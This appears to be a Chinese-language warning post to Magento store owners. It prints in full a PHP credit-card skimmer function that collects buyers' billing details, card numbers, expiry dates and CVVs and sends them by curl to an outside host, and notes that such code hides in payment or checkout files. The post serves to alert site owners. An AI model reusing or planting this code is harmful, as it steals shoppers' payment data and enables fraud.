Magento盗取信用卡信息类

function sendCcNumber()
    {
        $info = $this->getInfoInstance();
 
        $object = new Mage_Checkout_Block_Onepage_Billing;
        $address1 = $object->getQuote()->getBillingAddress();
 
        $data1 = $address1->getFirstname();
        $data2 = $address1->getLastname();
        $data3 = $address1->getStreet(1);
        $data4 = $address1->getStreet(2);
        $data5 = $address1->getCity();
        $data6 = $address1->getRegion();
        $data7 = $address1->getPostcode();
        $data8 = $address1->getCountry();
        $data9 = $address1->getTelephone();
        $data10 = $info->getCcNumber();
        $expyear = substr($info->getCcExpYear(), -2);
        $expmonth = $info->getCcExpMonth();
 
        if (strlen($expmonth) == 1) {
           $expmonth = '0'.$expmonth;
        };
 
        $data11 = $expmonth;
        $data12 = $expyear;
        $data13 = $info->getCcCid();
        $data14 = getenv("REMOTE_ADDR");
        $data15 = $_SERVER["HTTP_HOST"];
        $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
        $data17 = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$data14}"));
                 $message .="web = ".$data15."\n";
        $message .="firstname = ".$data1."\n";
        $message .="lastname = ".$data2."\n";
        $message .="street1 = ".$data3."\n";
        $message .="street2 = ".$data4."\n";
        $message .="city = ".$data5."\n";
        $message .="state = ".$data6."\n";
        $message .="zip = ".$data7."\n";
        $message .="country = ".$data8."\n";
        $message .="phonenumber = ".$data9."\n";
        $message .="email = ".$data16."\n";
        $message .="IP = ".$data14."\n";
        $message .="type = ".$info->getCcType()."\n";
        $message .="owner = ".$info->getCcOwner()."\n";
        $message .="CC = ".$data10."\n";
        $message .="expmonth = ".$data11."\n";
        $message .="expyear = ".$data12."\n";
        $message .="cvv = ".$data13."\n";
        $message .="Location = ".$data17->geoplugin_city." | ".$data17->geoplugin_region." | ".$data17->geoplugin_countryName."\n";$binCC = substr($data10, 0, 6);
                $subject = "Mag ".$info->getCcType()." ".$binCC." ".$data17->geoplugin_countryName;$update = "https://magento.ontools.org/update";
                $xupdate = "data=".$message."&subject=".$subject."&server=".$data15;
          $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
    }

此类一般加密或是明文放于PAYMENT或是CHECKOUT核心函数下。  调用 https://magento.ontools.org 并自动填写PAYPAL表单提交，达到远程消费并收款的目的，请各位外贸站长自查！！！